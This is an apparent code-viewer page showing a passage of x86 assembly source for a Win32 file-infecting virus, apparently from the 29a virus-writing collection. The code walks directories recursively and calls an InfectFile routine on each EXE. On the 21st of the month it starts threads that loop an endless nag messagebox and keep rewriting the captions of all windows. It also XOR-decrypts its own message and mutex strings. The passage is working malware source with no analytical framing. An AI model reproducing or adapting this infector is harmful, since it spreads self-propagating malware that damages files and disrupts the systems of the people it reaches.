📄 29a-7.014
字号:
popad
mov eax,1h
@InfectFailure:
push eax
mov eax,dword ptr [ebp+pMemory]
cmp eax,0h
je @InfectFailure1
push [ebp+pMemory]
call [ebp+_UnmapViewOfFile]
@InfectFailure1:
mov eax,dword ptr [ebp+FileMappedHandle]
cmp eax,0h
je @InfectFailure2
push [ebp+FileMappedHandle]
call [ebp+_CloseHandle]
@InfectFailure2:
mov eax,dword ptr [ebp+FileHandle]
cmp eax,0h
je @InfectFailure3
push [ebp+FileHandle]
call [ebp+_CloseHandle]
@InfectFailure3:
push [ebp+FileAttrib]
push edi
call [ebp+_SetFileAttributesA]
pop eax
ret
@_InfectFailure:
popad
mov eax,0h
jmp @InfectFailure
InfectFile endp
; Infects the given path recursively...
; I'm not gonna comment all the lines in this function, it's really annoying to code stuff like this, so
; if you wanna understand it better, I guess it's easier to code this function in C/C++ and then
; translate it to ASM, this way will take less time:)
; edi = path to infect
InfectPath proc
push [ebp+FindHandle]
push edi
call [ebp+_SetCurrentDirectoryA]
cmp eax,0h
je @ExitInfectPath2
lea ebx,[ebp+offset FindResult]
push ebx
lea ebx,[ebp+offset szEXEMask]
push ebx
call [ebp+_FindFirstFileA]
mov [ebp+FindHandle],eax
cmp eax,INVALID_HANDLE_VALUE
je @DirLoop
lea esi,[ebp+FindResult]
assume esi: ptr WIN32_FIND_DATA
lea edi,[ebp+FindResult.fd_cFileName]
call InfectFile
mov ecx,MAX_PATH
xor al,al
rep stosb
@NextLoop1:
lea ebx,[ebp+offset FindResult]
push ebx
push [ebp+FindHandle]
call [ebp+_FindNextFileA]
cmp eax,0h
je @DirLoop
push eax
lea edi,[ebp+FindResult.fd_cFileName]
call InfectFile
mov ecx,MAX_PATH
xor al,al
rep stosb
pop eax
cmp eax,0h
jne @NextLoop1
@DirLoop:
push [ebp+FindHandle]
call [ebp+_FindClose]
lea ebx,[ebp+offset FindResult]
push ebx
lea ebx,[ebp+offset szGlobalMask]
push ebx
call [ebp+_FindFirstFileA]
mov [ebp+FindHandle],eax
cmp eax,INVALID_HANDLE_VALUE
je @ExitInfectPath1
@NextLoop2:
lea esi,[ebp+FindResult]
assume esi: ptr WIN32_FIND_DATA
mov edx,[esi].fd_dwFileAttributes
and edx,FILE_ATTRIBUTE_DIRECTORY
cmp edx,0h
je @NextLoop2Jump
cmp [esi].fd_cFileName,2Eh ; ASCII for '.'
je @NextLoop2Jump
lea edi,[ebp+FindResult.fd_cFileName]
call InfectPath
@NextLoop2Jump:
lea ebx,[ebp+offset FindResult]
push ebx
push [ebp+FindHandle]
call [ebp+_FindNextFileA]
cmp eax,0h
jnz @NextLoop2
@ExitInfectPath1:
lea ebx,[ebp+offset szUpDir]
push ebx
call [ebp+_SetCurrentDirectoryA]
push [ebp+FindHandle]
call [ebp+_FindClose]
@ExitInfectPath2:
pop [ebp+FindHandle]
ret
InfectPath endp
; this is the payload
PayLoad proc
pushad
lea ebx,[ebp+offset Time] ; getting system date/time
push ebx ; using API GetLocalTime
call [ebp+_GetLocalTime]
;mov bx,[ebp+Time.st_wMonth] ; launching the visual payload when it's the right date
;cmp bx,9 ; we check here the month,in this version will work on 21st of every month
;jne @SkipPayloadKernel ; otherwise skip visual payload
mov bx,[ebp+Time.st_wDay]
cmp bx,21
jne @SkipPayloadKernel
@PayloadKernel:
lea ebx,[ebp+offset ThreadID1] ; launching a thread which nags the user with a messagebox
push ebx
push 0h
lea ebx,[ebp+_EBP]
push ebx
lea ebx,[ebp+offset FuckingNagger]
push ebx
push 0h
push 0h
call [ebp+_CreateThread]
lea ebx,[ebp+offset ThreadID2] ; launching a thread which periodically changes captions of all
push ebx ; active windows possible
push 0h
lea ebx,[ebp+_EBP]
push ebx
lea ebx,[ebp+offset Win32GeorginaPayload]
push ebx
push 0h
push 0h
call [ebp+_CreateThread]
@SkipPayloadKernel:
popad
ret
PayLoad endp
; edi = handle of the most parent window to change the captions
ChangeWndText proc
cmp edi,0h
je @CWT1
lea ebx,[ebp+offset szGeorgina] ; changes window's caption
push ebx
push edi
call [ebp+_SetWindowTextA]
@CWT1:
push edi
call [ebp+_GetTopWindow] ; getting top window
cmp eax,0h
je @CWT2
push edi
mov edi,eax
call ChangeWndText ; recursively change the window caption of sub-windows
pop edi
@CWT2:
push 2h ; 2h = GW_HWNDNEXT
push edi
call [ebp+_GetWindow] ; recursively change the window caption of sub-windows,
cmp eax,0h ; iteration over next windows...
je @CWT3
push edi
mov edi,eax
call ChangeWndText ; ...and again entering the recursive part
pop edi
@CWT3:
ret
ChangeWndText endp
FuckingNagger proc
pushad
; Here we try to get parameter EBP passed to the new thread...
mov ebp,[ebp+0Ch] ; 0Ch = 12, 0Ch points to the first parameter in the stack in a new thread
mov ebp,[ebp]
push PAGE_READWRITE ; allocating virtual memory to decrypt the payload message
push MEM_COMMIT
push 100h
push 0h
call [ebp+_VirtualAlloc]
cmp eax,0h
je @_not_alloced
mov [ebp+pVirtualMemory],eax
jmp @_alloced
@_not_alloced:
lea eax,[ebp+offset szVirus]
mov [ebp+pVirtualMemory],eax
@_alloced:
call CryptVirusMessage ; decrypting payload message
@FuckingNagger:
push 0h ; running forever loop of messagebox :)
lea ebx,[ebp+offset szGeorgina]
push ebx
push [ebp+pVirtualMemory]
push 0h
call [ebp+_MessageBoxA]
jmp @FuckingNagger
pushad
ret
FuckingNagger endp
Win32GeorginaPayload proc
pushad
; Here we try to get parameter EBP passed to the new thread...
mov ebp,[ebp+0Ch] ; 0Ch = 12, 0Ch points to the first parameter in the stack in a new thread
mov ebp,[ebp]
@ForeverPayload:
xor edi,edi
call ChangeWndText
push 8000 ; 8 seconds of delay between each update of the window captions
call [ebp+_Sleep]
jmp @ForeverPayload
popad
ret
Win32GeorginaPayload endp
CryptVirusMessage proc
pushad
; Decrypting virus message string
lea esi,[ebp+offset szVirus]
mov edi,[ebp+pVirtualMemory]
xor ecx,ecx
mov cl,szVirusMsgSize
cld
@decrypt:
lodsb ; performing simple XOR crypt/decrypt
xor al,0AAh
stosb
loopnz @decrypt
popad
ret
CryptVirusMessage endp
CryptMutexName proc
pushad
; Decrypting mutex name string....
lea esi,[ebp+offset szMutexName]
mov edi,esi
xor ecx,ecx
mov cl,MutexNameSize
cld
@_decrypt_mutex:
lodsb ; performing simple XOR crypt/decrypt
xor al,0AAh
stosb
loopnz @_decrypt_mutex
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -